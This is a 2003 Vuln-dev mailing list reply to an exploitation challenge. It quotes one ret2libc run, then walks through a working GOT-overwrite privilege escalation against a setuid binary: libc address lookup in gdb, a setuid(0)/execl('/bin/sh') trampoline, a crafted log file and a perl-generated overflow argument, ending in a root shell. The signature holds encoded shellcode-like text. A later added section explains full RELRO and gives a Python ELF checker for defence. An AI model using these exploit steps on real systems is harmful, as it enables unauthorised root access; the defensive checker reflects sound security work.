Vulnerability Development mailing list archives
Re: [Vuln-dev Challenge] Challenge #2
From: Jose Ronnick <matrix () phiral com>
Date: Sat, 24 May 2003 18:03:03 -0700
On Sat, 24 May 2003 13:11:13 +0200 spacewalker <spacewalker () 0xbadc0de be> wrote:

0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in fact. The challenge would have been interesting if the fopen() wasn't "a" but create and write from beginning.

$ ./exploit
Using system address 0x4005f531
And overwriting printf got at 0x0804971c starting by 0x08049713
sh-2.05b$ exit
exit
Segmentation fault

default offset is 5 (could vary).

spacewalker
/* Say NO to target[n] exploits ! */
I agree about using ret2libc... this one was easy enough you shouldn't have used shellcode.. =) however... you forget that system() executes through /bin/sh which will drop privs. Try making the vuln program suidroot and then run your exploit... still no root shell. =/ close.. but it really doesn't give you much more since you already had a basic user shell before you executed the sploit..

Here's one way to do it using ret2libc to avoid the privilege dropping.. (same as the encrypted post earlier, plaintext now since the cat's outta the bag anyways).. There's also a way to do this without building a trampoline prog to bounce off of.. just chaining libc calls... If no one else posts a solution doing it, I'll do it and post it later...

matrix@overdose vuln-dev $ gcc -o vuln2 vulndev2.c
matrix@overdose vuln-dev $ sudo chown root.root vuln2
matrix@overdose vuln-dev $ sudo chmod +s vuln2
matrix@overdose vuln-dev $ echo 'main(){sleep();execl();}' > e.c;gcc -o e.x e.c;gdb -q e.x; rm e.*
(gdb) break main
Breakpoint 1 at 0x804836e
(gdb) run
Starting program: /home/matrix/research/vuln-dev/e.x

Breakpoint 1, 0x0804836e in main ()
(gdb) p sleep
$1 = {<text variable, no debug info>} 0x400ce760 <sleep>
(gdb) p execl
$2 = {<text variable, no debug info>} 0x400cecc0 <execl>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
matrix@overdose vuln-dev $ objdump -R vuln2 | grep exit
0804974c R_386_JUMP_SLOT   exit
matrix@overdose vuln-dev $ echo 'main(){setuid(0);setgid(0);execl("/bin/sh","/bin/sh",0);}' > t.c;gcc -o t.ramp t.c;
matrix@overdose vuln-dev $ pwd
/home/matrix/research/vuln-dev
matrix@overdose vuln-dev $ printf "\x60\xe7\x0c\x40/home/matrix/research/vuln-dev/t.ramp\x00" > db.log
matrix@overdose vuln-dev $ ./vuln2 `perl -e 'print "\x4c\x97\x04\x08"x31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08"x3;'`
h `รง @/home/matrix/research/vuln-dev/t.ramp
root@overdose vuln-dev # id
uid=0(root) gid=0(root) groups=100(users),10(wheel),18(audio),250(portage)
root@overdose vuln-dev #

--
%JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP
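Both solutions in this thread depend on the same precondition: the binary's GOT (the `R_386_JUMP_SLOT` entry for `exit` that `objdump -R` lists above, or the `printf` slot in spacewalker's run) is writable at the time the overwrite happens. Modern toolchains can remove that precondition with full RELRO (`-Wl,-z,relro,-z,now`): the dynamic linker resolves every import at startup and then remaps the GOT read-only, so redirecting a slot to `execl` or `system` is no longer possible. The checker below is an added example, not code from this post or from the challenge; it reads the ELF program headers and `.dynamic` section directly (no `readelf`/`checksec` dependency) and reports whether a file has full, partial or no RELRO. `build_synthetic_elf64` is a constructed test input, a minimal non-runnable ELF image, so the checker can be exercised offline; the ELF constants are the standard gABI/GNU values.

```python
import struct
import sys

# ELF constants (ELF gABI plus the GNU extensions used for RELRO)
PT_DYNAMIC = 2
PT_GNU_RELRO = 0x6474E552   # segment that ld.so remaps read-only after relocation
DT_NULL = 0
DT_BIND_NOW = 24
DT_FLAGS = 30
DT_FLAGS_1 = 0x6FFFFFFB
DF_BIND_NOW = 0x8
DF_1_NOW = 0x1


def classify_relro(data: bytes) -> str:
    """Return 'full', 'partial' or 'none'.

    full    = PT_GNU_RELRO present and immediate binding requested, so the
              whole GOT is resolved at load time and then made read-only.
    partial = PT_GNU_RELRO present but lazy binding, so .got.plt (the jump
              slots a ret2libc chain overwrites) stays writable.
    none    = no PT_GNU_RELRO segment at all.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = data[4] == 2
    endian = "<" if data[5] == 1 else ">"
    if is64:
        (e_phoff,) = struct.unpack_from(endian + "Q", data, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x36)
    else:
        (e_phoff,) = struct.unpack_from(endian + "I", data, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", data, 0x2A)

    has_relro = False
    dyn_off = dyn_size = None
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            p_type, _flags, p_offset, _va, _pa, p_filesz = struct.unpack_from(
                endian + "IIQQQQ", data, off)
        else:
            p_type, p_offset, _va, _pa, p_filesz = struct.unpack_from(
                endian + "IIIII", data, off)
        if p_type == PT_GNU_RELRO:
            has_relro = True
        elif p_type == PT_DYNAMIC:
            dyn_off, dyn_size = p_offset, p_filesz

    # Walk the .dynamic entries looking for any of the three ways BIND_NOW is expressed.
    bind_now = False
    if dyn_off is not None:
        fmt = endian + ("qQ" if is64 else "iI")
        entsize = 16 if is64 else 8
        for off in range(dyn_off, dyn_off + dyn_size, entsize):
            if off + entsize > len(data):
                break
            tag, val = struct.unpack_from(fmt, data, off)
            if tag == DT_NULL:
                break
            if (tag == DT_BIND_NOW
                    or (tag == DT_FLAGS and val & DF_BIND_NOW)
                    or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                bind_now = True

    if has_relro and bind_now:
        return "full"
    if has_relro:
        return "partial"
    return "none"


def check_file(path: str) -> str:
    with open(path, "rb") as f:
        return classify_relro(f.read())


def build_synthetic_elf64(relro: bool, bind_now: bool) -> bytes:
    """Constructed test input: a minimal ELF64 image with only a program-header
    table and a .dynamic area. It is not a loadable binary, just enough structure
    for classify_relro() to parse."""
    ehsize, phentsize = 64, 56
    phnum = 2 if relro else 1
    dyn_off = ehsize + phnum * phentsize
    dyn = b"".join(struct.pack("<qQ", t, v) for t, v in
                   [(DT_FLAGS, DF_BIND_NOW if bind_now else 0), (DT_NULL, 0)])

    def phdr(p_type, off, size):
        # p_type, p_flags, p_offset, p_vaddr, p_paddr, p_filesz, p_memsz, p_align
        return struct.pack("<IIQQQQQQ", p_type, 4, off, 0, 0, size, size, 8)

    phdrs = phdr(PT_DYNAMIC, dyn_off, len(dyn))
    if relro:
        phdrs += phdr(PT_GNU_RELRO, dyn_off, len(dyn))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, little-endian
    header = ident + struct.pack("<HHIQQQIHHHHHH",
                                 3, 62, 1, 0, ehsize, 0, 0,   # ET_DYN, x86-64, e_phoff
                                 ehsize, phentsize, phnum, 64, 0, 0)
    return header + phdrs + dyn


if __name__ == "__main__":
    # Usage: python relro_check.py /path/to/setuid/binary ...
    for path in sys.argv[1:]:
        print(f"{path}: {check_file(path)} RELRO")
```

Run it over the setuid binaries on a host (`find / -perm -4000 -type f`) and anything reporting `partial` or `none` still exposes writable jump slots to exactly the GOT-redirect shown in this thread; a rebuild with `-Wl,-z,relro,-z,now` moves it to `full`.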
Attachment:
_bin
Description: